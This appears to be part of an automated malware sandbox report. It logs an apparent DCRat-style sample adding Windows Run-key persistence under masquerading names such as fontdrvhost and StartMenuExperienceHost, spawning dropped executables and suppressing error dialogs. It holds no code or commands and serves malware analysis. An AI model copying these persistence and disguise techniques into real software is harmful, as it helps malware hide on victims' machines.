    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tasklist
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tasklist
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run seCeUYjhGIFplo
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run seCeUYjhGIFplo
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run seCeUYjhGIFplo
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run seCeUYjhGIFplo
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhost
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhost
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhost
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fontdrvhost
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tasklist
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tasklist
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run seCeUYjhGIFplo
    Source: C:\agentInto\fontsessionruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run seCeUYjhGIFplo

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x4.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
